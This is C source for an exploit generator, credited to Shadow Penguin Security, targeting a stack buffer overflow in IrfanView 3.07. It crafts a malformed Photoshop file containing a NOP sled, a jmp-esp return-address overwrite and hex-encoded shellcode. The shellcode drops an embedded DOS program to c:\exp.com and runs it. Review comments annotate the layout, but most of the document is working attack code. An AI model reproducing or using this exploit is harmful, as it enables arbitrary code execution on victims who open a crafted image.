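/*=============================================================================
   Irfan View 3.07 Exploit
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin@backsection.net)
  =============================================================================

   Generator for a malformed Photoshop file (magic "8BPS") that overflows a
   stack buffer in IrfanView 3.07.  The output is MAXBUF bytes of 0x90 (NOP)
   sled with the following laid out at offset RETADR:

       +0   saved-EIP overwrite  -> JMPESP_ADR  ("jmp esp" in the target)
       +4   two NOPs (from the sled)
       +6   EB 04                (jmp short +4: hops over the dword at +8)
       +8   FAKE_ADR             (writable pointer, see note at the #define)
       +12  exploit_code, followed by its string table and exploit_data

   Security review notes:
     * All addresses are for Japanese Windows 98.  JMPESP_ADR is hard-coded
       (see the author's comment); the LoadLibrary / GetProcAddress addresses
       are read from THIS process at generation time and patched into the
       shellcode, so the file only works where kernel32 is mapped at the same
       address on the target (no ASLR, same OS build).
     * The patched addresses are 4 bytes wide, so the generator must be built
       as a 32-bit program; a 64-bit build is rejected at run time.
     * The stage-1 code carries a "_"-separated string table
       (msvcrt.dll, fopen, fclose, fwrite, exit, "wb", system, file name,
       payload) and NUL-terminates it in place with "xor al,al / mov
       [edi+disp],al"; together with the "exp.com" comment this indicates it
       writes exploit_data to c:\exp.com and runs it.  exploit_data starts
       with "mov al,13h / int 10h" (VGA mode 13h): a tiny DOS .COM demo.
     * Bug fixed in this revision: the original wrote buf[MAXBUF]=0, one byte
       past the end of the array.  fwrite() emits exactly MAXBUF bytes, so no
       terminator is needed.
*/

#ifndef _WIN32
#error "Build this as a 32-bit Win32 program: it embeds its own LoadLibrary/GetProcAddress addresses."
#endif

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

#define MAXBUF     0x22e0      /* size of the generated file (bytes)          */
#define RETADR     0x31E       /* offset of the saved return address          */
#define FAKE_ADR   0x80101010  /* Writable buffer pointer (original comment);
                                  presumably dereferenced by the target after
                                  the overwritten return - kept unchanged      */
#define JMPESP_ADR 0xbffca4f7  /* "jmp esp" address.  You have to change this
                                  value for non-Japanese Windows98.            */
#define HEAD       "8BPS\0"    /* Photoshop file magic                        */

/* Stage-1 shellcode.  Run-time patched bytes:
 *   0x1F..0x22            imm32 of "mov eax, LoadLibrary"
 *   GetProcAddress_fcp[]  imm32 of the four "mov eax, GetProcAddress"
 *   0x1C                  disp8 of the NUL that ends the file name (l1)
 *   0x6D                  "mov al, <payload length>"  (l2)
 *   0x77                  "mov bl, <payload offset>"  (l1+1)
 * The array is handled with strlen/strcat, so it must not contain 0x00 before
 * its terminator; the code below verifies this after patching. */
unsigned char exploit_code[300]={
0xEB,0x4F,0x5F,0x32,0xC0,0x88,0x47,0x0A,0x88,0x47,0x10,0x88,0x47,0x17,0x88,0x47,
0x1E,0x88,0x47,0x23,0x88,0x47,0x26,0x88,0x47,0x2D,0x88,0x47,0x3C,0x57,0xB8,0x50,
0x77,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xDB,0xB3,0x0B,0x8B,0xC7,0x03,0xC3,0x50,
0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x33,0xDB,0xB3,0x24,0x8B,0xC7,
0x03,0xC3,0x50,0xB3,0x32,0x8B,0xC7,0x03,0xC3,0x50,0xFF,0xD1,0x89,0x47,0x2E,0xEB,
0x02,0xEB,0x71,0x33,0xDB,0xB3,0x18,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x8B,0x47,0x2E,0x50,0x33,0xC0,0xB0,0x03,0x90,0x90,
0x50,0xB0,0x01,0x50,0x33,0xDB,0xB3,0x3D,0x03,0xDF,0x53,0xFF,0xD1,0x33,0xDB,0xB3,
0x11,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0x5F,
0x2E,0x53,0xFF,0xD0,0x33,0xDB,0xB3,0x27,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,
0x6E,0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0xB3,0x32,0x8B,0xCF,0x03,0xCB,0x51,0xFF,0xD0,
0x33,0xDB,0x53,0xB3,0x1F,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,
0xFF,0xD0,0xFF,0xD0,0xE8,0x39,0xFF,0xFF,0xFF,0x00
};

/* "exp.com": the payload the shellcode drops and runs (a 16-bit DOS program;
 * it opens with mov al,13h / int 10h).  Must not contain 0x00 - it is copied
 * with strcat. */
unsigned char exploit_data[1000]={
0xb0,0x13,0xcd,0x10,0xb0,0x0f,0xfe,0xc0,0xb4,0x0c,0xcd,0x10,0x03,0xd1,0x41,0x3c,
0x20,0x77,0xf1,0xeb,0xf1,0x00
};

/* Offsets of the four "mov eax, GetProcAddress" immediates in exploit_code. */
int GetProcAddress_fcp[4]={0x32,0x5e,0x88,0xbc};

/* String table appended to the shellcode; "_" separators become NULs at run
 * time.  The file name and payload are appended in main(). */
char string_buffer[1000] ="msvcrt.dll_fopen_fclose_fwrite_exit_wb_system_****";
char filename[100] = "c:\\exp.com";

/* Store v at dst as a 4-byte little-endian value. */
static void put_le32(unsigned char *dst, unsigned int v)
{
    dst[0] = (unsigned char)(v & 0xff);
    dst[1] = (unsigned char)((v >> 8) & 0xff);
    dst[2] = (unsigned char)((v >> 16) & 0xff);
    dst[3] = (unsigned char)((v >> 24) & 0xff);
}

/* Usage: <program> outputfile.  Writes the crafted file and exits 0 on
 * success, 1 on any error. */
int main(int argc, char *argv[])
{
    unsigned char buf[MAXBUF];
    unsigned char l1, l2;
    unsigned int p1, p2;
    size_t code_len, payload_len, table_len;
    int i;
    FILE *fp;

    if (argc < 2) {
        printf("usage : %s outputfile\n", argv[0]);
        exit(1);
    }
    /* The shellcode stores API addresses as 4-byte immediates; a 64-bit build
     * would silently truncate them. */
    if (sizeof(void *) != 4) {
        printf("This generator must be built as a 32-bit program.\n");
        exit(1);
    }

    /* NOP sled, then the file magic.  No terminator: fwrite() below writes
     * exactly MAXBUF bytes. */
    memset(buf, 0x90, MAXBUF);
    memcpy(buf, HEAD, 4);

    put_le32(buf + RETADR, JMPESP_ADR);   /* overwritten return address */
    buf[RETADR + 6] = 0xeb;               /* jmp short +4: skip FAKE_ADR, */
    buf[RETADR + 7] = 0x04;               /* land on the code at +12       */
    put_le32(buf + RETADR + 8, FAKE_ADR);

    /* Patch this process's LoadLibrary / GetProcAddress addresses into the
     * stage-1 code (only valid where kernel32 is mapped identically). */
    code_len = strlen((char *)exploit_code);
    p1 = (unsigned int)LoadLibrary;
    p2 = (unsigned int)GetProcAddress;
    put_le32(exploit_code + 0x1f, p1);
    for (i = 0; i < 4; i++) {
        put_le32(exploit_code + GetProcAddress_fcp[i], p2);
    }
    /* An address containing 0x00 would cut the C-string copy below short. */
    if (strlen((char *)exploit_code) != code_len) {
        printf("API address contains a NUL byte; payload would be truncated\n");
        exit(1);
    }

    /* Table geometry the shellcode needs, computed before the table is
     * extended (as in the original): l1 is the offset of the separator that
     * follows the file name, l2 the payload size. */
    l1 = (unsigned char)(strlen(filename) + strlen(string_buffer));
    l2 = (unsigned char)strlen((char *)exploit_data);

    table_len = strlen(string_buffer) + strlen(filename) + 1
              + strlen((char *)exploit_data);
    if (table_len >= sizeof string_buffer) {
        printf("string table too long\n");
        exit(1);
    }
    strcat(string_buffer, filename);
    strcat(string_buffer, "_");
    strcat(string_buffer, (char *)exploit_data);

    if (code_len + table_len >= sizeof exploit_code) {
        printf("shellcode + string table too long\n");
        exit(1);
    }
    strcat((char *)exploit_code, string_buffer);

    exploit_code[0x1c] = l1;                        /* mov [edi+l1], al (=0) */
    exploit_code[0x6d] = l2;                        /* mov al, l2            */
    exploit_code[0x77] = (unsigned char)(l1 + 1);   /* mov bl, l1+1          */

    payload_len = strlen((char *)exploit_code);
    if (RETADR + 12 + payload_len > MAXBUF) {
        printf("payload does not fit in the output buffer\n");
        exit(1);
    }
    memcpy(buf + RETADR + 12, exploit_code, payload_len);

    fp = fopen(argv[1], "wb");
    if (fp == NULL) {
        printf("Can not write file '%s'\n", argv[1]);
        exit(1);
    }
    /* A short write or failed flush leaves a file that will not trigger the
     * overflow; report it instead of printing "Done." */
    if (fwrite(buf, 1, MAXBUF, fp) != MAXBUF || fclose(fp) != 0) {
        printf("Can not write file '%s'\n", argv[1]);
        exit(1);
    }
    printf("Done.\n");
    return 0;
}

/* www.hack.co.za [2000]*/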